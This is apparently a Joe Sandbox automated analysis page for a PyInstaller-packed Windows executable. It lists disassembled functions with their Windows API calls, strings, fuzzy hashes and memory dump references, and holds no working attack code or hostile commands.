Associated: 00000002.00000002.2031877199.00007FF72B90E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031877199.00007FF72B911000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031946460.00007FF72B914000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff72b8d0000_iqA8j9yGcd.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 3765a10cee1e255344ee37f065f4be71d58868c9c9e645b3056c9746d3493235
Instruction ID: 48224d8cee4f86b3c12d462bfddbd0a93ca2fffe0d80d6cffbcf9751cbf26897
Opcode Fuzzy Hash: 3765a10cee1e255344ee37f065f4be71d58868c9c9e645b3056c9746d3493235
Instruction Fuzzy Hash: 55219232A18A8186DB61AF1CD840379B6A0FB94B54FA44334E65D876E9DF3DE421CF50

Function 00007FF72B8E03BC Relevance: 1.5, APIs: 1, Instructions: 48COMMONLIBRARYCODE

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF72B8E0410

Memory Dump Source

Source File: 00000002.00000002.2031801646.00007FF72B8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72B8D0000, based on PE: true

Associated: 00000002.00000002.2031713118.00007FF72B8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031832989.00007FF72B8FB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031877199.00007FF72B90E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031877199.00007FF72B911000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031946460.00007FF72B914000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff72b8d0000_iqA8j9yGcd.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 8e9754deeba93abb4745aa2efb451e77357aefa8fb0fbddb16feb6c8c90fdd62
Instruction ID: b5fe5809a15274a3f379d8efb0d3231e0b4d39ee3fdfcc6593292847fba0e850
Opcode Fuzzy Hash: 8e9754deeba93abb4745aa2efb451e77357aefa8fb0fbddb16feb6c8c90fdd62
Instruction Fuzzy Hash: 7301C861A0878140E604FF9A5D020B9E691FF95FE8F884631FE6C17BE6CE3CD4218B60

Function 00007FF72B8ED5FC Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(?,?,?,00007FF72B8E0C90,?,?,?,00007FF72B8E22FA,?,?,?,?,?,00007FF72B8E3AE9), ref: 00007FF72B8ED63A

Memory Dump Source

Source File: 00000002.00000002.2031801646.00007FF72B8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72B8D0000, based on PE: true

Associated: 00000002.00000002.2031713118.00007FF72B8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031832989.00007FF72B8FB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031877199.00007FF72B90E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031877199.00007FF72B911000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031946460.00007FF72B914000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff72b8d0000_iqA8j9yGcd.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 510c613edcbd96140e332c46b5608733b20d975e117422ad796dc4540c81bb80
Instruction ID: ba37cb2c313dd1a8bdc10e6266d36ad556c4f36044222caa6d44053b06d4d278
Opcode Fuzzy Hash: 510c613edcbd96140e332c46b5608733b20d975e117422ad796dc4540c81bb80
Instruction Fuzzy Hash: 9CF0DA10F1928685FE5476E99C416799190DF987A0FC84630E92E492F2EF6CA4A49AF0

Function 00007FF72B8D8E80 Relevance: 1.5, APIs: 1, Instructions: 19libraryCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF72B8D9390: MultiByteToWideChar.KERNEL32(?,?,?,00007FF72B8D45F4,00000000,00007FF72B8D1985), ref: 00007FF72B8D93C9

LoadLibraryW.KERNELBASE(?,00007FF72B8D6476,?,00007FF72B8D336E), ref: 00007FF72B8D8EA2

Memory Dump Source

Source File: 00000002.00000002.2031801646.00007FF72B8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72B8D0000, based on PE: true

Associated: 00000002.00000002.2031713118.00007FF72B8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031832989.00007FF72B8FB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031877199.00007FF72B90E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031877199.00007FF72B911000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031946460.00007FF72B914000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff72b8d0000_iqA8j9yGcd.jbxd

Similarity

API ID: ByteCharLibraryLoadMultiWide
String ID:
API String ID: 2592636585-0
Opcode ID: 3eee33850ff877a76f59ec51b6af72cd7d073a691558276a485592abc3036afa
Instruction ID: 219509657f593b6c7806d3e54d9fe1162bd8bf96deb00284c5ded7b812c98507
Opcode Fuzzy Hash: 3eee33850ff877a76f59ec51b6af72cd7d073a691558276a485592abc3036afa
Instruction Fuzzy Hash: 53D08C01B2428642EA48B76BBA466299251ABC9BC0FC89036EE0D07B6ADC3CD0614B00

Function 00007FF72B8D8E60 Relevance: 1.5, APIs: 1, Instructions: 8COMMON

Download Yara Rule

APIs

FreeLibrary.KERNELBASE(?,?,?,?,00007FF72B8D368F), ref: 00007FF72B8D8E64

Memory Dump Source

Source File: 00000002.00000002.2031801646.00007FF72B8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72B8D0000, based on PE: true

Associated: 00000002.00000002.2031713118.00007FF72B8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031832989.00007FF72B8FB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031877199.00007FF72B90E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031877199.00007FF72B911000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031946460.00007FF72B914000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff72b8d0000_iqA8j9yGcd.jbxd

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: 5a0b104966fc665656d7528ae90519590a02b5024a25b7ba9502a227bc27a1ca
Instruction ID: fc9cb86e237bc83e7787478e6c0f48487634196672af40d360d3ade93b3e83bc
Opcode Fuzzy Hash: 5a0b104966fc665656d7528ae90519590a02b5024a25b7ba9502a227bc27a1ca
Instruction Fuzzy Hash: 21B01220FE540B81A90437798C4A43011509774702FD00220C00AC01A0CC0C20EA0A10

Non-executed Functions

Function 00007FF72B8D89E0 Relevance: 70.3, APIs: 36, Strings: 4, Instructions: 257synchronizationwindowregistryCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF72B8D9390: MultiByteToWideChar.KERNEL32(?,?,?,00007FF72B8D45F4,00000000,00007FF72B8D1985), ref: 00007FF72B8D93C9

SetConsoleCtrlHandler.KERNEL32(?,?,FFFFFFFF,00007FF72B8D3F77), ref: 00007FF72B8D8A3B
GetStartupInfoW.KERNEL32(?,FFFFFFFF,00007FF72B8D3F77), ref: 00007FF72B8D8A56

Part of subcall function 00007FF72B8EA47C: _invalid_parameter_noinfo.LIBCMT ref: 00007FF72B8EA490

Part of subcall function 00007FF72B8E871C: _invalid_parameter_noinfo.LIBCMT ref: 00007FF72B8E8783

GetCommandLineW.KERNEL32(?,FFFFFFFF,00007FF72B8D3F77), ref: 00007FF72B8D8AE6
CreateProcessW.KERNEL32 ref: 00007FF72B8D8B1E
GetLastError.KERNEL32(?,FFFFFFFF,00007FF72B8D3F77), ref: 00007FF72B8D8B28

Part of subcall function 00007FF72B8D2C50: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF72B8D3706,?,00007FF72B8D3804), ref: 00007FF72B8D2C9E
Part of subcall function 00007FF72B8D2C50: FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF72B8D3706,?,00007FF72B8D3804), ref: 00007FF72B8D2D63
Part of subcall function 00007FF72B8D2C50: MessageBoxW.USER32 ref: 00007FF72B8D2D99

RegisterClassW.USER32 ref: 00007FF72B8D8B80
GetLastError.KERNEL32(?,FFFFFFFF,00007FF72B8D3F77), ref: 00007FF72B8D8B8B
CreateWindowExW.USER32 ref: 00007FF72B8D8BD5
GetLastError.KERNEL32(?,FFFFFFFF,00007FF72B8D3F77), ref: 00007FF72B8D8BE7
WaitForSingleObject.KERNEL32(?,FFFFFFFF,00007FF72B8D3F77), ref: 00007FF72B8D8C02
GetLastError.KERNEL32(?,FFFFFFFF,00007FF72B8D3F77), ref: 00007FF72B8D8C15
PeekMessageW.USER32 ref: 00007FF72B8D8C39
TranslateMessage.USER32 ref: 00007FF72B8D8C47
DispatchMessageW.USER32 ref: 00007FF72B8D8C51
PeekMessageW.USER32 ref: 00007FF72B8D8C6C
WaitForSingleObject.KERNEL32(?,FFFFFFFF,00007FF72B8D3F77), ref: 00007FF72B8D8C7E
WaitForSingleObject.KERNEL32(?,FFFFFFFF,00007FF72B8D3F77), ref: 00007FF72B8D8C99
TerminateProcess.KERNEL32(?,FFFFFFFF,00007FF72B8D3F77), ref: 00007FF72B8D8CAF
GetLastError.KERNEL32(?,FFFFFFFF,00007FF72B8D3F77), ref: 00007FF72B8D8CB9
WaitForSingleObject.KERNEL32(?,FFFFFFFF,00007FF72B8D3F77), ref: 00007FF72B8D8CC7
DestroyWindow.USER32(?,FFFFFFFF,00007FF72B8D3F77), ref: 00007FF72B8D8E04
GetExitCodeProcess.KERNEL32 ref: 00007FF72B8D8E19
CloseHandle.KERNEL32(?,FFFFFFFF,00007FF72B8D3F77), ref: 00007FF72B8D8E22
CloseHandle.KERNEL32(?,FFFFFFFF,00007FF72B8D3F77), ref: 00007FF72B8D8E2F

Strings

PyInstaller Onefile Hidden Window, xrefs: 00007FF72B8D8B95
Failed to create child process!, xrefs: 00007FF72B8D8B30
PyInstallerOnefileHiddenWindow, xrefs: 00007FF72B8D8B54
CreateProcessW, xrefs: 00007FF72B8D8B37

Memory Dump Source

Source File: 00000002.00000002.2031801646.00007FF72B8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72B8D0000, based on PE: true

Associated: 00000002.00000002.2031713118.00007FF72B8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031832989.00007FF72B8FB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031877199.00007FF72B90E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031877199.00007FF72B911000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031946460.00007FF72B914000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff72b8d0000_iqA8j9yGcd.jbxd

Similarity

API ID: Message$ErrorLast$ObjectProcessSingleWait$CloseCreateHandlePeekWindow_invalid_parameter_noinfo$ByteCharClassCodeCommandConsoleCtrlCurrentDestroyDispatchExitFormatHandlerInfoLineMultiRegisterStartupTerminateTranslateWide
String ID: CreateProcessW$Failed to create child process!$PyInstaller Onefile Hidden Window$PyInstallerOnefileHiddenWindow
API String ID: 3832162212-3165540532
Opcode ID: 99838be411f58a84d89697932930ae4644c798f1dd42cd928399edbb9bf0e48e
Instruction ID: bcedf4e03391b491b483d5a43267f410f0ebafc7b37e578fb140d2408f0e0737
Opcode Fuzzy Hash: 99838be411f58a84d89697932930ae4644c798f1dd42cd928399edbb9bf0e48e
Instruction Fuzzy Hash: FFD17531A08A8286E710AF78EC542ADB764FF94B58FD00235DA5D436B4DF3CE565CBA0

Function 00007FF72B8D83C0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 89fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,00007FF72B8D8919,00007FF72B8D3F9D), ref: 00007FF72B8D842B
RemoveDirectoryW.KERNEL32(?,00007FF72B8D8919,00007FF72B8D3F9D), ref: 00007FF72B8D84AE
DeleteFileW.KERNEL32(?,00007FF72B8D8919,00007FF72B8D3F9D), ref: 00007FF72B8D84CD
FindNextFileW.KERNEL32(?,00007FF72B8D8919,00007FF72B8D3F9D), ref: 00007FF72B8D84DB
FindClose.KERNEL32(?,00007FF72B8D8919,00007FF72B8D3F9D), ref: 00007FF72B8D84EC
RemoveDirectoryW.KERNEL32(?,00007FF72B8D8919,00007FF72B8D3F9D), ref: 00007FF72B8D84F5

Strings

%s\*, xrefs: 00007FF72B8D83F2

Memory Dump Source

Source File: 00000002.00000002.2031801646.00007FF72B8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72B8D0000, based on PE: true

Associated: 00000002.00000002.2031713118.00007FF72B8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031832989.00007FF72B8FB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031877199.00007FF72B90E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031877199.00007FF72B911000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031946460.00007FF72B914000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff72b8d0000_iqA8j9yGcd.jbxd

Similarity

API ID: FileFind$DirectoryRemove$CloseDeleteFirstNext
String ID: %s\*
API String ID: 1057558799-766152087
Opcode ID: 9215641a051a597ab69d89bbe09b444c24fb25eba6eed844fe9e008ab190e420
Instruction ID: 50d07c466ba77fe80cad4c953981ff8248afde4b5084e10f3885c26066f5d6b1
Opcode Fuzzy Hash: 9215641a051a597ab69d89bbe09b444c24fb25eba6eed844fe9e008ab190e420
Instruction Fuzzy Hash: 5A411321A1C54395EA20BB78EC545FAA361FB94B54FC00233D69D426A4EF3CF5558FA0

Function 00007FF72B8DD12C Relevance: 10.6, APIs: 7, Instructions: 71COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32 ref: 00007FF72B8DD148
RtlCaptureContext.KERNEL32 ref: 00007FF72B8DD175
RtlLookupFunctionEntry.KERNEL32 ref: 00007FF72B8DD18F
RtlVirtualUnwind.KERNEL32 ref: 00007FF72B8DD1D0
IsDebuggerPresent.KERNEL32 ref: 00007FF72B8DD224
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF72B8DD241
UnhandledExceptionFilter.KERNEL32 ref: 00007FF72B8DD24C

Memory Dump Source

Source File: 00000002.00000002.2031801646.00007FF72B8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72B8D0000, based on PE: true

Associated: 00000002.00000002.2031713118.00007FF72B8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031832989.00007FF72B8FB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031877199.00007FF72B90E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031877199.00007FF72B911000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031946460.00007FF72B914000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff72b8d0000_iqA8j9yGcd.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
String ID:
API String ID: 3140674995-0
Opcode ID: 357b26123f7cc0566be18cabbec560c6351d8abd4e8582c9dfa9d4018571b442
Instruction ID: a49e1acc7307f4e011f80c99f87bf82a1a7874edc28b74e92ede8e976a07aebe
Opcode Fuzzy Hash: 357b26123f7cc0566be18cabbec560c6351d8abd4e8582c9dfa9d4018571b442
Instruction Fuzzy Hash: A5313272608B8286EB609F64EC403EDB364FB95744F84403ADA4D47BA5EF38D559CB50

Function 00007FF72B8F5C00 Relevance: 9.3, APIs: 6, Instructions: 334timeCOMMON

Download Yara Rule

APIs

_get_daylight.LIBCMT ref: 00007FF72B8F5C45

Part of subcall function 00007FF72B8F5598: _invalid_parameter_noinfo.LIBCMT ref: 00007FF72B8F55AC

Part of subcall function 00007FF72B8EA948: HeapFree.KERNEL32(?,?,?,00007FF72B8F2D22,?,?,?,00007FF72B8F2D5F,?,?,00000000,00007FF72B8F3225,?,?,?,00007FF72B8F3157), ref: 00007FF72B8EA95E
Part of subcall function 00007FF72B8EA948: GetLastError.KERNEL32(?,?,?,00007FF72B8F2D22,?,?,?,00007FF72B8F2D5F,?,?,00000000,00007FF72B8F3225,?,?,?,00007FF72B8F3157), ref: 00007FF72B8EA968

Part of subcall function 00007FF72B8EA900: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF72B8EA8DF,?,?,?,?,?,00007FF72B8EA7CA), ref: 00007FF72B8EA909
Part of subcall function 00007FF72B8EA900: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF72B8EA8DF,?,?,?,?,?,00007FF72B8EA7CA), ref: 00007FF72B8EA92E

_get_daylight.LIBCMT ref: 00007FF72B8F5C34

Part of subcall function 00007FF72B8F55F8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF72B8F560C

_get_daylight.LIBCMT ref: 00007FF72B8F5EAA
_get_daylight.LIBCMT ref: 00007FF72B8F5EBB
_get_daylight.LIBCMT ref: 00007FF72B8F5ECC
GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF72B8F610C), ref: 00007FF72B8F5EF3

Memory Dump Source

Source File: 00000002.00000002.2031801646.00007FF72B8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72B8D0000, based on PE: true

Associated: 00000002.00000002.2031713118.00007FF72B8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031832989.00007FF72B8FB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031877199.00007FF72B90E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031877199.00007FF72B911000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031946460.00007FF72B914000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff72b8d0000_iqA8j9yGcd.jbxd

Similarity

API ID: _get_daylight$_invalid_parameter_noinfo$CurrentErrorFeatureFreeHeapInformationLastPresentProcessProcessorTimeZone
String ID:
API String ID: 4070488512-0
Opcode ID: 677ea417f3249c8bdb60afb6413c0575e0f743ff33606516b420b369f71394b1
Instruction ID: a41a443a513cf237e5db5f99203bb9e90ffe6dc6563bb5865a6d40b486e4ef1e
Opcode Fuzzy Hash: 677ea417f3249c8bdb60afb6413c0575e0f743ff33606516b420b369f71394b1
Instruction Fuzzy Hash: 67D1B922E1824286E720BF29DC411F9A7A1FFA4794FC48135DA5D476B6DF3CF4618BA0

Function 00007FF72B8EA614 Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlCaptureContext.KERNEL32 ref: 00007FF72B8EA68D
RtlLookupFunctionEntry.KERNEL32 ref: 00007FF72B8EA6A5
RtlVirtualUnwind.KERNEL32 ref: 00007FF72B8EA6E0
IsDebuggerPresent.KERNEL32 ref: 00007FF72B8EA719
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF72B8EA723
UnhandledExceptionFilter.KERNEL32 ref: 00007FF72B8EA72E

Memory Dump Source

Source File: 00000002.00000002.2031801646.00007FF72B8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72B8D0000, based on PE: true

Associated: 00000002.00000002.2031713118.00007FF72B8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031832989.00007FF72B8FB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031877199.00007FF72B90E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031877199.00007FF72B911000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031946460.00007FF72B914000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff72b8d0000_iqA8j9yGcd.jbxd

Similarity

API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
String ID:
API String ID: 1239891234-0
Opcode ID: ae2d74aaff6e8c1310ec24f87c3395aa5518f909cdba62f6f822c67f0a9cc142
Instruction ID: 5897a2cf82172e9817ff2d37f90f6b757583375406e7b88eb4f46ba45d53ff04
Opcode Fuzzy Hash: ae2d74aaff6e8c1310ec24f87c3395aa5518f909cdba62f6f822c67f0a9cc142
Instruction Fuzzy Hash: F2318332618B8286DB20DF68EC402AEB3A4FB95754F900135EA9D43B65DF3CD155CB50

Function 00007FF72B8F1874 Relevance: 7.8, APIs: 5, Instructions: 282COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF72B8F18C0
FindFirstFileExW.KERNEL32 ref: 00007FF72B8F19CA

Memory Dump Source

Source File: 00000002.00000002.2031801646.00007FF72B8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72B8D0000, based on PE: true

Associated: 00000002.00000002.2031713118.00007FF72B8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031832989.00007FF72B8FB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031877199.00007FF72B90E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031877199.00007FF72B911000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031946460.00007FF72B914000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff72b8d0000_iqA8j9yGcd.jbxd

Similarity

API ID: FileFindFirst_invalid_parameter_noinfo
String ID:
API String ID: 2227656907-0
Opcode ID: 471de8175ffa50438b20796c5ba06e190623de8bcba55c14971da5e7bf2bc1ae
Instruction ID: 16e79c66066bc8454d6ea0845eb433852d56d47bbf7eb3e92a04c82898808b6f
Opcode Fuzzy Hash: 471de8175ffa50438b20796c5ba06e190623de8bcba55c14971da5e7bf2bc1ae
Instruction Fuzzy Hash: 2EB1C821B1869241EA61BB6A9D002B9E350EF64FE4FC45131ED5D07BA5EF3CF491CBA0

Function 00007FF72B8F5E7C Relevance: 6.1, APIs: 4, Instructions: 143timeCOMMON

Download Yara Rule

APIs

_get_daylight.LIBCMT ref: 00007FF72B8F5EAA

Part of subcall function 00007FF72B8F55F8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF72B8F560C

_get_daylight.LIBCMT ref: 00007FF72B8F5EBB

Part of subcall function 00007FF72B8F5598: _invalid_parameter_noinfo.LIBCMT ref: 00007FF72B8F55AC

_get_daylight.LIBCMT ref: 00007FF72B8F5ECC

Part of subcall function 00007FF72B8F55C8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF72B8F55DC

Part of subcall function 00007FF72B8EA948: HeapFree.KERNEL32(?,?,?,00007FF72B8F2D22,?,?,?,00007FF72B8F2D5F,?,?,00000000,00007FF72B8F3225,?,?,?,00007FF72B8F3157), ref: 00007FF72B8EA95E
Part of subcall function 00007FF72B8EA948: GetLastError.KERNEL32(?,?,?,00007FF72B8F2D22,?,?,?,00007FF72B8F2D5F,?,?,00000000,00007FF72B8F3225,?,?,?,00007FF72B8F3157), ref: 00007FF72B8EA968

GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF72B8F610C), ref: 00007FF72B8F5EF3

Memory Dump Source

Source File: 00000002.00000002.2031801646.00007FF72B8D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72B8D0000, based on PE: true

Associated: 00000002.00000002.2031713118.00007FF72B8D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031832989.00007FF72B8FB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031877199.00007FF72B90E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031877199.00007FF72B911000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000002.00000002.2031946460.00007FF72B914000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff72b8d0000_iqA8j9yGcd.jbxd

Similarity

API ID: _get_daylight_invalid_parameter_noinfo$ErrorFreeHeapInformationLastTimeZone
String ID:
API String ID: 3458911817-0
Opcode ID: 179af59534a267e8b56f66eebf2dbf2058aebcf107c16e98e161f461d30bd41f
Instruction ID: f8d5340080795d8886664c35d3005fe4f9edbd86a512b5b3541a4503cb3d1a51
Opcode Fuzzy Hash: 179af59534a267e8b56f66eebf2dbf2058aebcf107c16e98e161f461d30bd41f
Instruction Fuzzy Hash: 94518631A1864286E720FF29DC815A9E7A0FB98794FC09135EA4D476B6DF3CF4518FA0

Function 00007FF72B8D5830 Relevance: 229.6, APIs: 86, Strings: 45, Instructions: 400libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(?,00007FF72B8D64CF,?,00007FF72B8D336E), ref: 00007FF72B8D5840
GetLastError.KERNEL32(?,00007FF72B8D64CF,?,00007FF72B8D336E), ref: 00007FF72B8D5852
GetProcAddress.KERNEL32(?,00007FF72B8D64CF,?,00007FF72B8D336E), ref: 00007FF72B8D5889
GetLastError.KERNEL32(?,00007FF72B8D64CF,?,00007FF72B8D336E), ref: 00007FF72B8D589B
GetProcAddress.KERNEL32(?,00007FF72B8D64CF,?,00007FF72B8D336E), ref: 00007FF72B8D58B4
GetLastError.KERNEL32(?,00007FF72B8D64CF,?,00007FF72B8D336E), ref: 00007FF72B8D58C6
GetProcAddress.KERNEL32(?,00007FF72B8D64CF,?,00007FF72B8D336E), ref: 00007FF72B8D58DF
GetLastError.KERNEL32(?,00007FF72B8D64CF,?,00007FF72B8D336E), ref: 00007FF72B8D58F1
GetProcAddress.KERNEL32(?,00007FF72B8D64CF,?,00007FF72B8D336E), ref: 00007FF72B8D590D
GetLastError.KERNEL32(?,00007FF72B8D64CF,?,00007FF72B8D336E), ref: 00007FF72B8D591F
GetProcAddress.KERNEL32(?,00007FF72B8D64CF,?,00007FF72B8D336E), ref: 00007FF72B8D593B
GetLastError.KERNEL32(?,00007FF72B8D64CF,?,00007FF72B8D336E), ref: 00007FF72B8D594D
GetProcAddress.KERNEL32(?,00007FF72B8D64CF,?,00007FF72B8D336E), ref: 00007FF72B8D5969
GetLastError.KERNEL32(?,00007FF72B8D64CF,?,00007FF72B8D336E), ref: 00007FF72B8D597B
GetProcAddress.KERNEL32(?,00007FF72B8D64CF,?,00007FF72B8D336E), ref: 00007FF72B8D5997
GetLastError.KERNEL32(?,00007FF72B8D64CF,?,00007FF72B8D336E), ref: 00007FF72B8D59A9
GetProcAddress.KERNEL32(?,00007FF72B8D64CF,?,00007FF72B8D336E), ref: 00007FF72B8D59C5
GetLastError.KERNEL32(?,00007FF72B8D64CF,?,00007FF72B8D336E), ref: 00007FF72B8D59D7

Strings

PyConfig_Read, xrefs: 00007FF72B8D59E9, 00007FF72B8D5A0B
PyConfig_SetWideStringList, xrefs: 00007FF72B8D5A73, 00007FF72B8D5A95
PyObject_SetAttrString, xrefs: 00007FF72B8D5D81, 00007FF72B8D5DA3
PyConfig_InitIsolatedConfig, xrefs: 00007FF72B8D59BB, 00007FF72B8D59DD
PyUnicode_DecodeFSDefault, xrefs: 00007FF72B8D5F1F, 00007FF72B8D5F41
PyObject_Str, xrefs: 00007FF72B8D5DAF, 00007FF72B8D5DD1
Py_ExitStatusException, xrefs: 00007FF72B8D58AA, 00007FF72B8D58CC
PySys_GetObject, xrefs: 00007FF72B8D5E67, 00007FF72B8D5E89
PyConfig_Clear, xrefs: 00007FF72B8D598D, 00007FF72B8D59AF
PyUnicode_FromFormat, xrefs: 00007FF72B8D5F4D, 00007FF72B8D5F6F
PyModule_GetDict, xrefs: 00007FF72B8D5CC9, 00007FF72B8D5CEB
PyUnicode_Join, xrefs: 00007FF72B8D5FA9, 00007FF72B8D5FCB
PySys_SetObject, xrefs: 00007FF72B8D5E95, 00007FF72B8D5EB7
PyObject_CallFunctionObjArgs, xrefs: 00007FF72B8D5D25, 00007FF72B8D5D47
PyObject_GetAttrString, xrefs: 00007FF72B8D5D53, 00007FF72B8D5D75
Py_DecRef, xrefs: 00007FF72B8D5836, 00007FF72B8D5858
PyErr_NormalizeException, xrefs: 00007FF72B8D5AFD, 00007FF72B8D5B1F
PyStatus_Exception, xrefs: 00007FF72B8D5E39, 00007FF72B8D5E5B
PyErr_Clear, xrefs: 00007FF72B8D5AA1, 00007FF72B8D5AC3
PyErr_Restore, xrefs: 00007FF72B8D5B87, 00007FF72B8D5BA9
